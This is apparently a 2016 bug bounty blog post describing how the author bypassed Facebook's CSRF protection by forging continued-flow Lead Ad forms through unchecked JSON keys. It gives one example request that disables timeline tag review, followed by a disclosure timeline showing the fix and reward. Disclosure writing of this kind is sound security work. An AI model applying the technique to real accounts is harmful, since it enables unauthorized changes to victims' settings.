Tuesday, May 17, 2016

How I bypassed Facebook CSRF once again!


I found a vulnerability in Facebook that allowed me to create arbitrary form in Facebook that send a POST request with CSRF token to any Facebook endpoints or external hosts!

It was very similar to this bug which I found in 2015.

'fb_dtsg' Anti-CSRF token supposed to get validated at server-side
and if an action request doesn't that token, Facebook will drop the request without any process on it!
( not all actions, you may find some of them ;-) )

I found this vulnerability in  Continued Flow section of  Lead Ads!

A continued flow lead ad means the final step is completed on the advertiser's website. The lead ad will collect all of the data provided and pass it to a destination URL using a hash or POST request. This is valuable for flows where you need data that Facebook is unwilling to collect (e.g. passwords for creating an account).

Root Cause

Facebook's post method was used in continued flow and in the method, fb_dtsg added to every request.


So we need to create a continued flow lead ad and according to the document this is only available to whitelisted users.
But I bypassed this restriction with a simple trick.

Whenever a user creates lead ad form, a JSON object contains data were sent to create endpoint.
Fortunately I found another endpoint to get created forms as JSON and then I saw these keys:

form JSON

I added these keys to frombuilder json with modified values, form created with continued flow.
There was no server side check ...

For example disable timeline review action:
Endpoint URL: https://facebook.com/ajax/settings/timeline/review.php  
Body: tag_approval_enabled=0
Final URL: https://facebook.com/ajax/settings/timeline/review.php?tag_approval_enabled=0&__a=1

Finally I tested it with Facebook Tools and it worked!


YouTube removed the original video due a unknown reason!
So I moved my videos to Facebook :)

Fun Part: 

When custom field name was fb_dtsg  ... :D


  •  Mar 29 2016 "Like last year ;)" : Initial report
  •  Apr  06 2016 : Requested more info
  •  Apr  06 2016 : More details sent
  •  Apr  07 2016 : Bug acknowledged by security team
  •  Apr  07 2016 : Fun part sent!
  •  Apr  12 2016 : Bug fixed
  •  Apr  13 2016 : Facebook security team rewarded me with a $7,500.
  •  Apr  18 2016 : More info about whitelist sent
  •  May 06 2016 : Second bug fixed